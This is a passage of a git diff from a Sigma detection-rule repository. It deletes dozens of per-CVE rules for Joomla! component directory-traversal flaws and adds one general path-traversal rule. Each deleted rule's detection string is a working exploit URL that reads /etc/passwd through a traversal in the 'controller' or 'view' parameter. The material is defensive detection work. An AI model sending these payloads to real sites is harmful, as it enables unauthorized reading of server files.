rules/web/web_cve_2010_1954_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1955_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1956_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1979_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1980_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1981_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_1983_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2033_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2034_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2035_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2036_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2122_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2259_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2307_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2682_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2861_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_2920_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_3426_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_4231_exploitation_attempt.yml delete mode 100644 rules/web/web_cve_2010_4617_exploitation_attempt.yml create mode 100644 rules/web/web_path_traversal_exploitation_attempt.yml diff --git a/rules/web/web_cve_2010_0943_exploitation_attempt.yml b/rules/web/web_cve_2010_0943_exploitation_attempt.yml deleted file mode 100644 index fb5bfcbf..00000000 --- a/rules/web/web_cve_2010_0943_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-0943 Exploitation Attempt -id: f28d6faa-4163-4967-b397-414aab6cbe41 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component com_jashowcase - Directory Traversal:Directory traversal - vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - in a jashowcase action to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_0944_exploitation_attempt.yml b/rules/web/web_cve_2010_0944_exploitation_attempt.yml deleted file mode 100644 index f33fd3a7..00000000 --- a/rules/web/web_cve_2010_0944_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-0944 Exploitation Attempt -id: 55d082fa-118a-4649-8e06-bf342de0ba84 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component com_jcollection - Directory Traversal:Directory traversal - vulnerability in the JCollection (com_jcollection) component for Joomla! allows - remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_0985_exploitation_attempt.yml b/rules/web/web_cve_2010_0985_exploitation_attempt.yml deleted file mode 100644 index 22a45c28..00000000 --- a/rules/web/web_cve_2010_0985_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-0985 Exploitation Attempt -id: 624c389f-24aa-44c2-b702-c2b58eb18ff9 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component com_abbrev - Local File Inclusion:Directory traversal - vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! - allows remote attackers to include and execute arbitrary local files via a .. (dot - dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1219_exploitation_attempt.yml b/rules/web/web_cve_2010_1219_exploitation_attempt.yml deleted file mode 100644 index 4a23c671..00000000 --- a/rules/web/web_cve_2010_1219_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1219 Exploitation Attempt -id: c05d288c-1f70-4090-8f86-9739afedb14b -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component com_janews - Local File Inclusion:Directory traversal - vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote - attackers to read arbitrary local files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1304_exploitation_attempt.yml b/rules/web/web_cve_2010_1304_exploitation_attempt.yml deleted file mode 100644 index f848a240..00000000 --- a/rules/web/web_cve_2010_1304_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1304 Exploitation Attempt -id: 6bc9b1ee-a560-4944-84d7-02d45d99cdb1 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component User Status - Local File Inclusion:Directory traversal - vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 - for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in - the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1305_exploitation_attempt.yml b/rules/web/web_cve_2010_1305_exploitation_attempt.yml deleted file mode 100644 index 77a6a40c..00000000 --- a/rules/web/web_cve_2010_1305_exploitation_attempt.yml +++ /dev/null @@ -1,27 +0,0 @@ -title: CVE-2010-1305 Exploitation Attempt -id: 4c450e3e-b786-4bf6-bbf4-f2f44546d61e -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component JInventory 1.23.02 - Local File Inclusion:Directory - traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component - 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows - remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1306_exploitation_attempt.yml b/rules/web/web_cve_2010_1306_exploitation_attempt.yml deleted file mode 100644 index 1d0a373d..00000000 --- a/rules/web/web_cve_2010_1306_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1306 Exploitation Attempt -id: 613ccec4-9812-4cc7-a2f5-bf88383cf83d -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Picasa 2.0 - Local File Inclusion:Directory traversal - vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! - allows remote attackers to read arbitrary local files via a .. (dot dot) in the - controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1307_exploitation_attempt.yml b/rules/web/web_cve_2010_1307_exploitation_attempt.yml deleted file mode 100644 index cff57926..00000000 --- a/rules/web/web_cve_2010_1307_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1307 Exploitation Attempt -id: d2bcd27a-de8c-465b-889a-62588138feaa -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Magic Updater - Local File Inclusion:Directory traversal - vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows - remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1308_exploitation_attempt.yml b/rules/web/web_cve_2010_1308_exploitation_attempt.yml deleted file mode 100644 index 52c29e67..00000000 --- a/rules/web/web_cve_2010_1308_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1308 Exploitation Attempt -id: 4cf2d8e5-2b82-484e-b412-bb5fcfb519eb -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component SVMap 1.1.1 - Local File Inclusion:Directory traversal - vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1312_exploitation_attempt.yml b/rules/web/web_cve_2010_1312_exploitation_attempt.yml deleted file mode 100644 index 65aa281a..00000000 --- a/rules/web/web_cve_2010_1312_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1312 Exploitation Attempt -id: fc07dc98-780f-4493-98ce-6e1b7c9742e2 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component News Portal 1.5.x - Local File Inclusion:Directory - traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x - for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in - the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1313_exploitation_attempt.yml b/rules/web/web_cve_2010_1313_exploitation_attempt.yml deleted file mode 100644 index cc836644..00000000 --- a/rules/web/web_cve_2010_1313_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1313 Exploitation Attempt -id: 4287d3e9-5ba8-4a00-925b-bce992e8b2d5 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion:Directory - traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and - 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers - to read arbitrary files via a .. (dot dot) in the view parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1314_exploitation_attempt.yml b/rules/web/web_cve_2010_1314_exploitation_attempt.yml deleted file mode 100644 index 22c062b9..00000000 --- a/rules/web/web_cve_2010_1314_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1314 Exploitation Attempt -id: 0ce79c5d-cb0c-4800-a040-a0c8c7ad45d1 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Highslide 1.5 - Local File Inclusion:Directory traversal - vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! - allows remote attackers to read arbitrary files via a .. (dot dot) in the controller - parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1345_exploitation_attempt.yml b/rules/web/web_cve_2010_1345_exploitation_attempt.yml deleted file mode 100644 index e03153f1..00000000 --- a/rules/web/web_cve_2010_1345_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1345 Exploitation Attempt -id: b92bc21b-e649-4695-8f7c-8b881e33ed1c -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Cookex Agency CKForms - Local File Inclusion:Directory - traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 - for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in - the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1353_exploitation_attempt.yml b/rules/web/web_cve_2010_1353_exploitation_attempt.yml deleted file mode 100644 index 17d6462a..00000000 --- a/rules/web/web_cve_2010_1353_exploitation_attempt.yml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1353 Exploitation Attempt -id: 3a9f4835-3518-40e9-91bc-ebb1d918c055 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component LoginBox - Local File Inclusion:Directory traversal - vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1354_exploitation_attempt.yml b/rules/web/web_cve_2010_1354_exploitation_attempt.yml deleted file mode 100644 index 0c88d17b..00000000 --- a/rules/web/web_cve_2010_1354_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1354 Exploitation Attempt -id: 841e7037-c68e-40d1-9fd4-d08fee87f124 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component VJDEO 1.0 - Local File Inclusion:Directory traversal - vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows - remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1470_exploitation_attempt.yml b/rules/web/web_cve_2010_1470_exploitation_attempt.yml deleted file mode 100644 index 00e0319d..00000000 --- a/rules/web/web_cve_2010_1470_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1470 Exploitation Attempt -id: 91dcce8a-b0dc-49e8-a766-9bd0d234d397 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Web TV 1.0 - Local File Inclusion:Directory traversal - vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote - attackers to read arbitrary files and possibly have unspecified other impact via - a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1471_exploitation_attempt.yml b/rules/web/web_cve_2010_1471_exploitation_attempt.yml deleted file mode 100644 index af7e60db..00000000 --- a/rules/web/web_cve_2010_1471_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1471 Exploitation Attempt -id: c25e9c8b-5bc3-4eda-a29e-62ed09349442 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Address Book 1.5.0 - Local File Inclusion:Directory - traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for - Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the - controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1472_exploitation_attempt.yml b/rules/web/web_cve_2010_1472_exploitation_attempt.yml deleted file mode 100644 index 7caddd10..00000000 --- a/rules/web/web_cve_2010_1472_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1472 Exploitation Attempt -id: d189b718-577a-4826-ba75-7965be24403f -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Horoscope 1.5.0 - Local File Inclusion:Directory traversal - vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! - allows remote attackers to read arbitrary files via a .. (dot dot) in the controller - parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1473_exploitation_attempt.yml b/rules/web/web_cve_2010_1473_exploitation_attempt.yml deleted file mode 100644 index b48610e1..00000000 --- a/rules/web/web_cve_2010_1473_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1473 Exploitation Attempt -id: 51848efa-1963-4f90-b9ca-e614ab66c848 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Advertising 0.25 - Local File Inclusion:Directory traversal - vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows - remote attackers to read arbitrary files and possibly have unspecified other impact - via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1474_exploitation_attempt.yml b/rules/web/web_cve_2010_1474_exploitation_attempt.yml deleted file mode 100644 index 25da0891..00000000 --- a/rules/web/web_cve_2010_1474_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1474 Exploitation Attempt -id: dcb1e22b-b95e-40b0-a95c-620baf73e56d -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion:Directory traversal - vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! - allows remote attackers to read arbitrary files and possibly have unspecified other - impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1475_exploitation_attempt.yml b/rules/web/web_cve_2010_1475_exploitation_attempt.yml deleted file mode 100644 index 94ed4d8f..00000000 --- a/rules/web/web_cve_2010_1475_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1475 Exploitation Attempt -id: 58505c84-2d43-4686-9fd3-497a7e4f89a3 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion:Directory - traversal vulnerability in the Preventive & Reservation (com_preventive) component - 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1476_exploitation_attempt.yml b/rules/web/web_cve_2010_1476_exploitation_attempt.yml deleted file mode 100644 index fb13d546..00000000 --- a/rules/web/web_cve_2010_1476_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1476 Exploitation Attempt -id: a095b6d3-0c40-4719-aa55-01dcb47bc03f -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion:Directory - traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 - for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified - other impact via a .. (dot dot) in the view parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1494_exploitation_attempt.yml b/rules/web/web_cve_2010_1494_exploitation_attempt.yml deleted file mode 100644 index 2a20d4b9..00000000 --- a/rules/web/web_cve_2010_1494_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1494 Exploitation Attempt -id: 4c7ff51e-47cb-4f89-8a1c-ec71be8d811a -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component AWDwall 1.5.4 - Local File Inclusion:Directory traversal - vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1495_exploitation_attempt.yml b/rules/web/web_cve_2010_1495_exploitation_attempt.yml deleted file mode 100644 index 2db4bbab..00000000 --- a/rules/web/web_cve_2010_1495_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1495 Exploitation Attempt -id: d87e5c39-a7ed-4f34-8be1-ad1697f3d7d7 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Matamko 1.01 - Local File Inclusion:Directory traversal - vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1532_exploitation_attempt.yml b/rules/web/web_cve_2010_1532_exploitation_attempt.yml deleted file mode 100644 index a0fc22ad..00000000 --- a/rules/web/web_cve_2010_1532_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1532 Exploitation Attempt -id: 2abfc7f1-cf26-44c4-a3ff-5033bfe6b855 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion:Directory - traversal vulnerability in the givesight PowerMail Pro (com_powermail) component - 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1533_exploitation_attempt.yml b/rules/web/web_cve_2010_1533_exploitation_attempt.yml deleted file mode 100644 index 034bfb71..00000000 --- a/rules/web/web_cve_2010_1533_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1533 Exploitation Attempt -id: a97dbf8e-5234-4821-9033-d1209c55415c -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component TweetLA 1.0.1 - Local File Inclusion:Directory traversal - vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1534_exploitation_attempt.yml b/rules/web/web_cve_2010_1534_exploitation_attempt.yml deleted file mode 100644 index ce58f784..00000000 --- a/rules/web/web_cve_2010_1534_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1534 Exploitation Attempt -id: 2a9be005-a6b9-4cdc-aa9e-4d08ba721143 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component Shoutbox Pro - Local File Inclusion:Directory traversal - vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote - attackers to read arbitrary files via a .. (dot dot) in the controller parameter - to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1535_exploitation_attempt.yml b/rules/web/web_cve_2010_1535_exploitation_attempt.yml deleted file mode 100644 index 3adce8a2..00000000 --- a/rules/web/web_cve_2010_1535_exploitation_attempt.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1535 Exploitation Attempt -id: ce1c278f-5c58-4846-93eb-3fd21ed6b41c -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion:Directory traversal - vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows - remote attackers to read arbitrary files and possibly have unspecified other impact - via a .. (dot dot) in the controller parameter to index.php. -references: - - https://github.com/projectdiscovery/nuclei-templates -logsource: - category: webserver -detection: - selection: - c-uri|contains: - - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity - - Unknown -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/web/web_cve_2010_1601_exploitation_attempt.yml b/rules/web/web_cve_2010_1601_exploitation_attempt.yml deleted file mode 100644 index 208fd52b..00000000 --- a/rules/web/web_cve_2010_1601_exploitation_attempt.yml +++ 